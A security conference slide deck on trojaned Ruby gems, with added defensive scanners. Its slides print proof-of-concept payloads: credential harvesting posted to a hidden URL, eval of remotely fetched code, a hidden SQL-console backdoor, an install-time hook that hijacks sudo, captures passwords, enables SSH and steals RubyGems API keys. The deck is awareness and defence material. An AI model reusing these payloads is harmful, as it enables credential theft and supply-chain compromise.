Slide 1

Hacking with Gems
Benjamin Smith @benjamin_smith
Monday, June 17, 13

Slide 2

How-to get rich quick and (maybe) not go to jail!

Slide 3

Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.

Slide 4

who i am

Slide 8

what i am NOT

Slide 10

please do not try this at home

Slide 14

Lawful Evil / Lawful Good

Slide 18

once upon a time

Slide 19

GEM
  remote: https://rubygems.org/
  specs:
    actionmailer (3.2.12)
      actionpack (= 3.2.12)
      mail (~> 2.4.4)
    actionpack (3.2.12)
      activemodel (= 3.2.12)
      activesupport (= 3.2.12)
      builder (~> 3.0.0)
      erubis (~> 2.7.0)
    ...

Slide 20

what’s the worst that could happen?

Slide 22

gem 'awesome_rails_flash_messages'
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 23

before...

Slide 24

after!

Slide 25

some “side effects”
if params.to_s.match(Base64.decode64('cGF...'))

Slide 26

...
File.open("#{Rails.root}/public/development.log", 'a+') do |f|
  f.write("#{params.inspect}\n")
end

Slide 27

?!?
Net::HTTP.post_form(
  URI.parse(Base64.decode64('aHR0cDo...')),
  { 'log' => params.merge(:url => request.url).inspect }
)

Slide 28

i like cGFzc3dvcmQ=\n
if params.to_s.match(Base64.decode64('cGF...'))

Slide 29

i like password
if params.to_s.match("password")

Slide 30

“development.log”
...
"user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"}
...

Slide 31

elsewhere...

Slide 32

profit
• Step 1: do something
• Step 2: do something else
• Step 3: ????
• Step 4: profit

Slide 37

profit
• Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws
• Step 3: use emails/pws on banking websites to transfer funds
• Step 4: profit
• Step 5: flee the country

Slide 38

a one way ticket to

Slide 39

that was easy. what else can I do?

Slide 40

gem 'net_http_detector'
github.com/benjaminleesmith/net_http_detector

Slide 41

show me the hack
Net::HTTP.post_form(#, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...

Slide 42

how it works
def HTTP.valid_post_form(url, params)
  ...

def HTTP.post_form(url, params)
  self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
  Net::HTTP.valid_post_form(url, params)
end

Slide 45

...and one more thing...
eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))

Slide 46

database what?
append_before_filter :net_http_detector
...
if params[:db_console]
  @tables = ActiveRecord::Base.connection.tables
  if params[:query]
    @output = ActiveRecord::Base.connection.execute(params[:query])

Slide 50

/users/sign_in

Slide 51

/users/sign_in?db_console=t

Slide 52

hello db access!

Slide 53

SELECT * FROM users;

Slide 54

UPDATE users SET admin=1 WHERE id=42;

Slide 55

CREATE USER admin1 WITH PASSWORD 'password';
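
The two hooks net_http_detector relies on, the alias-and-wrap of Net::HTTP.post_form (slide 42) and the before_filter that turns ?db_console=t into a SQL console (slide 46), both change where Ruby thinks a method is defined. The block below is an added example (editor's code, not from the talk or from any of Ben's gems): it records the file and line behind every method Net::HTTP defines right after the stdlib is loaded, then applies a harmless forwarding stub of the same shape as the gem's patch and diffs the two snapshots. Taking the baseline before any gem is required is an assumption the check depends on; in a Rails app you would snapshot ApplicationController the same way to catch the extra before_filter method.

```ruby
require 'net/http'

# Map every method a module defines directly (not inherited) to the
# [file, line] that currently defines it. C-implemented methods report nil.
def method_origins(mod)
  origins = {}
  mod.singleton_methods(false).each do |name|
    origins["#{mod}.#{name}"] = mod.method(name).source_location
  end
  mod.instance_methods(false).each do |name|
    origins["#{mod}##{name}"] = mod.instance_method(name).source_location
  end
  origins
end

# Diff a baseline against the current state. A method is reported when the
# file defining it changed (class reopened, method redefined) or when it did
# not exist at baseline (an alias such as valid_post_form, or a new
# before_filter method dropped into a controller).
def redefined_methods(baseline, current)
  current.each_with_object({}) do |(name, now), changed|
    was = baseline[name]
    changed[name] = { was: was, now: now } if was != now
  end
end

# Baseline for the classes we care about, recorded right after the stdlib is
# loaded. Assumption: this runs before Bundler.require pulls in any gem.
BASELINE = { 'Net::HTTP' => method_origins(Net::HTTP) }.freeze

def audit(mod)
  redefined_methods(BASELINE.fetch(mod.name), method_origins(mod))
end

# --- constructed simulation of net_http_detector's patch (slide 42) ---
# Same shape as the gem: alias the real method away, define a wrapper in its
# place. This stub only forwards; it does not log or exfiltrate anything.
module Net
  class HTTP
    class << self
      alias_method :valid_post_form, :post_form
      def post_form(url, params)
        valid_post_form(url, params)
      end
    end
  end
end

# Human-readable report: one line per changed method with both locations.
def report(mod)
  audit(mod).map do |name, loc|
    was = loc[:was] ? loc[:was].join(':') : '(did not exist)'
    now = loc[:now] ? loc[:now].join(':') : '(native)'
    "#{name}: was #{was}, now #{now}"
  end
end

puts report(Net::HTTP) if $PROGRAM_NAME == __FILE__
```

Every gem that reopens a core class shows up here, ActiveSupport included, so treat the output as a diff against a known-good run rather than a verdict; the signal is a method whose new location is a gem that has no business touching it.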

Slide 56

careful of wolves in sheep’s clothing

Slide 62

profit
• Step 1: write a gem that does something
• Step 2: add code to provide DB access
• Step 3: use personal info to apply for a boat loan (i.e. buy a pimp trimaran)
• Step 4: profit
• Step 5: flee the country

Slide 63

i like the beach

Slide 64

that was easy. what else can I do?

Slide 65

gem 'better_date_to_s'
github.com/benjaminleesmith/better_date_to_s

Slide 66

what it claims to do
Date.new(2005, 1, 1).to_s(:short)
=> "1 Jan"
...instead of...
=> " 1 Jan"

Slide 68

what it also does
set_date_formats_for(Rails.env, Rails.root.to_s)

Slide 69

better_date_to_s.bundle
[hexdump of the compiled extension: the 64-bit Mach-O magic (CF FA ED FE) followed by the __TEXT, __DATA and __LINKEDIT segment names and their sections (__text, __stubs, __stub_helper, __cstring, __unwind_info, __eh_frame, __nl_symbol_ptr, __got, __la_symbol_ptr, __data); the rest is unreadable binary]

Slide 70

behind the curtain
if (strcmp(rails_env, "production") == 0) {
  sprintf(tar_command,
          "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1",
          rails_root, rails_root);
  system(tar_command);
}

Slide 71

what what

Slide 72

i can haz source

Slide 73

truth time
• this gem doesn't actually work
• but it could... if I wasn't lazy
• "fat" gems are tricky to compile

Slide 74

so much code so little time
• Step 1: write a gem that does something
• Step 2: add code to expose source
• Step 3: sell to competitors?
• Step 4: profit?
• Step 5: flee the country

Slide 75

that was easy hard ("easy" crossed out). what else can I do? (that's easier)

Slide 76

gem install be_truthy
github.com/benjaminleesmith/be_truthy

Slide 77

what it does
> true.should be_true
> User.new.should be_true
> User.new.should be_truthy

Slide 78

what it ACTUALLY does

Slide 80

file tree looks ok

Slide 81

source code looks good
require "be_truthy/version"

module BeTruthy
end

Slide 82

but what was this?

Slide 83

I see no C

Slide 84

run the what file?
Gem::Specification.new do |gem|
  ...
  gem.extensions = ["Rakefile"]
  ...
end

Slide 85

there is no Rakefile

Slide 86

the real file tree

Slide 88

what does the Rakefile do?

Slide 89

sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

Slide 90

File.open(profile, 'a+') do |f|
  f.write("alias sudo='ruby #{home}/.tmp'\n")
end

Slide 91

FileUtils.rm(__FILE__)

Slide 92

what does "sudo" do now?

Slide 93

print "WARNING: Improper use of the sudo command ..."
system "stty -echo"
password = $stdin.gets.chomp
system "stty echo"
print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

Slide 97

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on

Slide 98

/usr/bin/sudo dscl . -create /Users/#{username}
...
/usr/bin/sudo dscl . -passwd /Users/#{username} password`

Slide 99

Net::HTTP.post_form(URI.parse('http://.../logs'), {'log' => 'ssh enabled'})

Slide 100

ssh sysadmin@your-ip
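
What the be_truthy Rakefile leaves behind (slides 89-91) is one line in the shell profile and one hidden script under the home directory; everything else, the Rakefile included, is gone by the time the install finishes. The block below is an added example (editor's code, not from the talk) that reads shell start-up files and reports any alias or function shadowing a command that handles passwords, keys or root, together with what it points at. The list of rc files and of commands is an assumption, and the sample .bashrc is constructed from the line on slide 90.

```ruby
# Commands whose redefinition in a shell rc file deserves a look: they take
# passwords or tokens, or run as root. Assumption: extend for your environment.
SHADOWED_COMMANDS = %w[sudo su ssh scp gpg gem bundle git curl].freeze

# Start-up files the common login shells read. Assumption; add your own.
RC_FILES = %w[.profile .bash_profile .bashrc .bash_login .zprofile .zshrc].freeze

# Match "alias sudo=...", "sudo() {" and "function sudo() {".
ALIAS_RE    = /\A\s*alias\s+(?<cmd>[A-Za-z0-9_-]+)\s*=\s*(?<target>.*)\z/
FUNCTION_RE = /\A\s*(?:function\s+)?(?<cmd>[A-Za-z0-9_-]+)\s*\(\)\s*\{?/

# Scan the lines of one rc file; returns an array of finding hashes.
def shadowed_commands(lines, file = '(string)')
  lines.each_with_index.filter_map do |line, idx|
    m = ALIAS_RE.match(line) || FUNCTION_RE.match(line)
    next unless m && SHADOWED_COMMANDS.include?(m[:cmd])
    target = m.names.include?('target') ? m[:target].strip.delete("'\"") : '(shell function)'
    {
      file: file, line: idx + 1, command: m[:cmd], target: target,
      # A target under a dotfile or dotdir in $HOME is the pattern from the slides.
      hidden_target: target.split.any? { |w| w =~ %r{(?:\A~|\A/home/[^/]+|\A/Users/[^/]+)/\.} }
    }
  end
end

# Walk the usual rc files in a home directory and collect every finding.
def scan_home(home)
  RC_FILES.flat_map do |name|
    path = File.join(home, name)
    File.file?(path) ? shadowed_commands(File.readlines(path, chomp: true), path) : []
  end
end

# Constructed sample: a benign .bashrc plus the line be_truthy appends.
SAMPLE_BASHRC = <<~'RC'.lines(chomp: true)
  export PATH="$HOME/bin:$PATH"
  alias ll='ls -la'
  alias sudo='ruby /Users/ben/.tmp'
  gem() { command gem "$@"; }
RC

if $PROGRAM_NAME == __FILE__
  shadowed_commands(SAMPLE_BASHRC, '~/.bashrc').each { |f| p f }
  home = ENV.fetch('HOME', nil)
  scan_home(home).each { |f| p f } if home
end
```

Run it on a developer machine after a suspect install: a sudo that points at a dotfile under the home directory, as on slide 90, is the signal. Pair it with `type sudo` in the live shell, since an alias can also come from a file this list does not cover.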

Slide 101

take away: don't install ben's gems

Slide 103

how could I get you to install my gems?

Slide 104

what gems are trustworthy?

Slide 105

how can I add my code to already trusted gems?

Slide 106

back in the be_truthy gem
gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
gem_list = `gem list`
Net::HTTP.post_form(...)

Slide 110

now I own your gems

Slide 111

> git clone your-gem-repo
...add a little code...
> rake build
> gem push your-gem

Slide 112

do people trust your gems?

Slide 113

do people who install your gems have trustworthy gems?

Slide 115

there’s still one problem

Slide 116

bootstrapping

Slide 117

being popular sucks

Slide 118

conferences

Slide 119

RubyJS

Slide 120

websocket

Slide 121

brakeman

Slide 122

rom

Slide 126

[censored]

Slide 127

so what happens now?

Slide 128

ruby gems goes down

Slide 129

heroku deploys go down

Slide 130

i go to the beach

Slide 133

recovery

Slide 134

so what now?

Slide 135

gem 'awesome_rails_flash_messages'
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 136

Little Snitch
obdev.at/products/littlesnitch/index.html

Slide 137

gem install be_truthy
github.com/benjaminleesmith/be_truthy

Slide 138

fseventer
fernlightning.com/doku.php?id=software:fseventer:start

Slide 139

don’t “gem install” from strangers

Slide 140

gem fetch vs gem install
> gem fetch be_truthy
> gem unpack be_truthy-0.0.1.gem
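
Fetching and unpacking gives you the package as it will actually be installed, which is where every trick in this talk lives: the base64-wrapped match string and log URL (slides 25-29), the eval of a fetched snippet (slide 45), the pre-compiled .bundle (slides 69-70), the gem.extensions = ["Rakefile"] install hook with its self-deleting Rakefile (slides 84-91) and the read of ~/.gem/credentials (slide 106). The block below is an added example (editor's code, neither the talk's nor RubyGems' own tooling) that walks an unpacked gem directory, flags those patterns, decodes every Base64.decode64('...') literal so the hidden string is visible in the report, and rejects any extension hook other than ext/*/extconf.rb. The rule set is an assumption limited to what this talk demonstrates; the sample source and gemspec are constructed from the slides, and the log URL hidden in the sample is a made-up example.com address.

```ruby
require 'base64'

# One rule per trick shown in the talk. Assumption: extend for your own review.
SOURCE_RULES = {
  'eval of data'            => /\beval\s*\(/,
  'outbound HTTP'           => /Net::HTTP\.(?:post_form|get|start)\b|URI\.parse\(/,
  'shell command'           => /\bsystem\s*[\( ]|`[^`]*`|%x[\[({]/,
  'writes app log/public'   => %r{Rails\.root\}?/public/},
  'appends to shell rc'     => /\.(?:profile|bash_profile|bashrc|zshrc)\b/,
  'reads RubyGems API key'  => %r{\.gem/credentials},
  'deletes itself'          => /FileUtils\.rm\(__FILE__\)|File\.delete\(__FILE__\)/,
  'rewrites privileged cmd' => %r{alias\s+sudo\s*=|/usr/bin/sudo},
}.freeze

# Base64.decode64('...') with a string literal: decode it so the hidden value
# ("password", a log URL) appears in the report instead of the blob.
B64_LITERAL = /Base64\.decode64\(\s*(['"])([A-Za-z0-9+\/=\\n\s]+)\1\s*\)/

# Extension hooks run at install time. Only ext/*/extconf.rb is expected;
# a Rakefile or anything else is how be_truthy ran its payload.
EXTENSIONS_RE = /\.extensions\s*=\s*\[([^\]]*)\]/

# Files that ship machine code. Assumption: flag all of them for manual review.
BINARY_EXT = %w[.bundle .so .dll .dylib].freeze

def scan_source(path, text)
  findings = []
  text.each_line.with_index(1) do |line, no|
    SOURCE_RULES.each do |label, re|
      findings << { file: path, line: no, rule: label, text: line.strip } if line =~ re
    end
    line.scan(B64_LITERAL) do |_quote, blob|
      decoded = Base64.decode64(blob.gsub('\n', ''))   # drop literal "\n" escapes
      findings << { file: path, line: no, rule: 'base64 literal', text: decoded }
    end
  end
  findings
end

def scan_gemspec(path, text)
  m = EXTENSIONS_RE.match(text) or return []
  exts = m[1].scan(/['"]([^'"]+)['"]/).flatten
  exts.reject { |e| e =~ %r{\Aext/[^/]+/extconf\.rb\z} }
      .map { |e| { file: path, line: nil, rule: 'unexpected extension hook', text: e } }
end

# Walk an unpacked gem (the directory `gem unpack` created).
def scan_gem_dir(dir)
  Dir.glob(File.join(dir, '**', '*')).select { |f| File.file?(f) }.flat_map do |f|
    rel = f.sub(%r{\A#{Regexp.escape(dir)}/?}, '')
    if BINARY_EXT.include?(File.extname(f))
      [{ file: rel, line: nil, rule: 'prebuilt binary', text: "#{File.size(f)} bytes" }]
    elsif f.end_with?('.gemspec')
      scan_gemspec(rel, File.read(f))
    elsif f =~ /\.(?:rb|rake)\z|Rakefile\z/
      scan_source(rel, File.read(f))
    else
      []
    end
  end
end

# Constructed samples, reproduced from the slides (the URL is invented).
SAMPLE_FLASH = <<~'RB'
  if params.to_s.match(Base64.decode64('cGFzc3dvcmQ=\n'))
    File.open("#{Rails.root}/public/development.log", 'a+') { |f| f.write("#{params.inspect}\n") }
    Net::HTTP.post_form(URI.parse(Base64.decode64('aHR0cDovL2V4YW1wbGUuY29tL2xvZ3M=')), { 'log' => params.inspect })
  end
RB

SAMPLE_GEMSPEC = <<~'RB'
  Gem::Specification.new do |gem|
    gem.name = "be_truthy"
    gem.extensions = ["Rakefile"]
  end
RB

if $PROGRAM_NAME == __FILE__
  (scan_source('lib/flash.rb', SAMPLE_FLASH) + scan_gemspec('be_truthy.gemspec', SAMPLE_GEMSPEC)).each { |f| p f }
  scan_gem_dir(ARGV[0]).each { |f| p f } if ARGV[0]
end
```

Run the script with the unpacked directory as its argument; on the sample input it reports "password" and the decoded log URL for the base64 literals, the write under public/, the outbound post, and the Rakefile extension hook.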

Slide 143

curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

Slide 144

gem install rails -P HighSecurity

Slide 145

> gem install rails -P HighSecurity
Fetching: activesupport-3.2.12.gem (100%)
ERROR:  While executing gem ... (Gem::Exception)
    Unsigned gem

Slide 146

gem cert --build

Slide 147

https://www.rubygems-openpgp-ca.org/
https://github.com/rubygems-trust

Slide 148

sandboxing

Slide 149

github.com/rubygems/rubygems

Slide 150

tools to detect malicious code

Slide 151

private gem repos

Slide 152

do not try this at home

Slide 153

don't install gems you don't need to

Slide 154

pay attention to what your gems do

Slide 155

monitor your system

Slide 156

read the source

Slide 157

gem install coal-mine-canary
github.com/benjaminleesmith/coal-mine-canary

Slide 158

on install

Slide 159

the results

Slide 160

thank you!

Slide 161

questions? ideas?
@benjamin_smith
https://github.com/benjaminleesmith